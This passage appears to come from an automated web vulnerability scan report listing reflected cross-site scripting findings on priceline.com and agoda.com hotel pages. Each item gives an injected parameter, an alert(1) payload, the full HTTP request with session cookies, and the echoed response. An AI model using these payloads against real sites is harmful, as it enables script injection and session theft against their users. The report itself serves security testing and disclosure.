Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...
rchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&otherCityName=Boston%2CUnited+States&CkInDay=04&session_key=711510AC721510AC20111003000909914181269334&key=gtapcnq5b0c98"%3balert(1)//acb6c7dcc1f&o_num=null

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:00 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498126


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
it("||");
    selLmID = selLM[0];
    selLmName = selLM[1];
    htlInitWaitMessage(C_WAIT_DELAY_SEARCH);
    var theAction = "/hotelsNearListings.do?key=gtapcnq5b0c98";alert(1)//acb6c7dcc1f&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN";
    window.location.href = "http://" + "travela.priceline.com" + "/hotel" + theAction + "&poiID=" + selLmID + "&poiName=" + escape(s
...[SNIP]...

4.150. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc99b'%3balert(1)//ce9060c5f8b was submitted in the key parameter. This input was echoed as fc99b';alert(1)//ce9060c5f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...
rchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&otherCityName=Boston%2CUnited+States&CkInDay=04&session_key=711510AC721510AC20111003000909914181269334&key=gtapcnq5fc99b'%3balert(1)//ce9060c5f8b&o_num=null

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:14 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=64247C3F36705ED9F645318F6EA1AA8E; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<script language="JavaScript">
function newSearch(){
newSearchURL('/hotel/1.do?pn=1&key=gtapcnq5fc99b';alert(1)//ce9060c5f8b&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN#newSearch');
}
function changeCity(){
changeCityURL('/hotel/changeCity.do?key=gtapcnq5fc99b';alert(1)//ce9060c5f8b&jsk=5463010a5064010a
...[SNIP]...

4.151. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b080d"style%3d"x%3aexpression(alert(1))"0ff302ff5ae was submitted in the key parameter. This input was echoed as b080d"style="x:expression(alert(1))"0ff302ff5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...
rchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&otherCityName=Boston%2CUnited+States&CkInDay=04&session_key=711510AC721510AC20111003000909914181269334&key=gtapcnq5b080d"style%3d"x%3aexpression(alert(1))"0ff302ff5ae&o_num=null

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:46 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=9DCE631CD5E41480BE6987F382FD15D6; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 503777


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<a href="/hotel/listings.do?selectedTab=0&key=gtapcnq5b080d"style="x:expression(alert(1))"0ff302ff5ae&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN" class="selected-list">
...[SNIP]...

4.152. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the numberOfRooms request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ebfe"%3balert(1)//c64366dbbc8 was submitted in the numberOfRooms parameter. This input was echoed as 9ebfe";alert(1)//c64366dbbc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=19ebfe"%3balert(1)//c64366dbbc8&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&othe
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:58 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=D3B0AE8E8F20DA9739B628426E322F3D; Path=/hotel
Vary: Accept-Encoding
Content-Length: 297757
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
eaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=19ebfe";alert(1)//c64366dbbc8&country=US&static=Y", 'toolbar=no,width=1,height=1,left=" + (screen.width-30)/2 + ",top=" + (screen.height-30)/2 + ",status=yes,scrollbars=no,resizable=yes', true, true, "");
</SCRIPT>
...[SNIP]...

4.153. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the numberOfRooms request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2abcf'%3balert(1)//704c3f0f990 was submitted in the numberOfRooms parameter. This input was echoed as 2abcf';alert(1)//704c3f0f990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=12abcf'%3balert(1)//704c3f0f990&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&othe
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:08 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=7597DD4BB8230C132AF65EDD99327DB0; Path=/hotel
Vary: Accept-Encoding
Content-Length: 297756
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
submitForm(sURLAddon,zoneId) {

   
           var url='/hotels/startOffer.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&FromHotelRTLPath=Y&searchType=CITY&cityName=Boston%2C+MA&numberOfRooms=12abcf';alert(1)//704c3f0f990&cityID=3000008602&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011';
   

   if ((sURLAddon != null) && ((sURLAddon != ""))) {
       url=url+sURLAddon;
   }
   if (typeof(C_WAIT_DELAY_SEARCH)!="undefi
...[SNIP]...

4.154. http://travela.priceline.com/hotel/searchResults.do [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f61eb"%3balert(1)//53d85817f37 was submitted in the key parameter. This input was echoed as f61eb";alert(1)//53d85817f37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5f61eb"%3balert(1)//53d85817f37&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:27 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=D2D23F0F8DD825D314A241A82A20243B; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498012


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
it("||");
    selLmID = selLM[0];
    selLmName = selLM[1];
    htlInitWaitMessage(C_WAIT_DELAY_SEARCH);
    var theAction = "/hotelsNearListings.do?key=gtapcnq5f61eb";alert(1)//53d85817f37&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN";
    window.location.href = "http://" + "travela.priceline.com" + "/hotel" + theAction + "&poiID=" + selLmID + "&poiName=" + escape(s
...[SNIP]...

4.155. http://travela.priceline.com/hotel/searchResults.do [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31a85'%3balert(1)//a55356e1663 was submitted in the key parameter. This input was echoed as 31a85';alert(1)//a55356e1663 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq531a85'%3balert(1)//a55356e1663&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:54 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=47061B8143EDEB535C1CC46F73CE9D97; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498011


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<script language="JavaScript">
function newSearch(){
newSearchURL('/hotel/1.do?pn=1&key=gtapcnq531a85';alert(1)//a55356e1663&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN#newSearch');
}
function changeCity(){
changeCityURL('/hotel/changeCity.do?key=gtapcnq531a85';alert(1)//a55356e1663&jsk=5463010a5064010a
...[SNIP]...

4.156. http://travela.priceline.com/hotel/searchResults.do [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b45"style%3d"x%3aexpression(alert(1))"f593ad246e3 was submitted in the key parameter. This input was echoed as e2b45"style="x:expression(alert(1))"f593ad246e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5e2b45"style%3d"x%3aexpression(alert(1))"f593ad246e3&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:44 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 503670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<a href="/hotel/listings.do?selectedTab=0&key=gtapcnq5e2b45"style="x:expression(alert(1))"f593ad246e3&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN" class="selected-list">
...[SNIP]...

4.157. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_AdScript.aspx

Issue detail

The value of the conversionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d825c"onerror%3d"alert(1)"2170802e0bd was submitted in the conversionID parameter. This input was echoed as d825c"onerror="alert(1)"2170802e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306d825c"onerror%3d"alert(1)"2170802e0bd&conversionLabel=M6MLCJbtiQIQsuTm1QM&_=1317602266727 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
